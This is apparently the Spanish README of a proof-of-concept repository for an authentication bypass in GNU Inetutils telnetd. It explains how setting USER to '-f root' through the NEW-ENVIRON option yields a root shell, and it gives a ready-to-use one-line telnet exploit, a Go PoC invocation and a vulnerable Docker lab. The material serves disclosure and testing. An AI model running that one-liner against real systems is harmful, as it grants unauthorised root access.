
GNU Inetutils telnetd Omisión de Autenticación Remota
En serio, ¿telnet en 2026? Vamos, es hora de avanzar. SSH existe desde 1995. 🤦
Una vulnerabilidad crítica de bypass de autenticación en telnetd de GNU Inetutils que afecta a las versiones 1.9.3 hasta 2.7.
La vulnerabilidad explota la opción telnet NEW-ENVIRON para inyectar argumentos maliciosos en login(1). Al establecer USER=-f root mediante el protocolo telnet, un atacante puede eludir la autenticación y obtener una shell de root sin credenciales.
El protocolo telnet admite la opción NEW-ENVIRON (RFC 1572) que permite al cliente enviar variables de entorno al servidor. El daemon telnetd pasa la variable USER a como argumento.
login(1)Al enviar USER=-f root, el valor se interpreta como:
-f: Omitir autenticación (host de confianza)root: Usuario objetivoEsto provoca que se ejecute login -f root, otorgando acceso root inmediato.
El PoC detecta la explotación exitosa comprobando IAC WILL ECHO (0xff 0xfb 0x01), la señal del protocolo que el servidor envía cuando se concede acceso a la shell.
# Construir y ejecutar el contenedor telnetd vulnerable
docker compose up --build -d
# Probar el exploit
go run poc.go 127.0.0.1 2323
# Usando el PoC en Go (con shell interactiva)
go run poc.go <target> <port>
# PoC simple usando el cliente telnet estándar
env USER='-f root' telnet -a <target> <port>
poc.go - Exploit en Go con shell interactivaDockerfile - Contenedor telnetd vulnerabledocker-compose.yml - Orquestación del laboratorio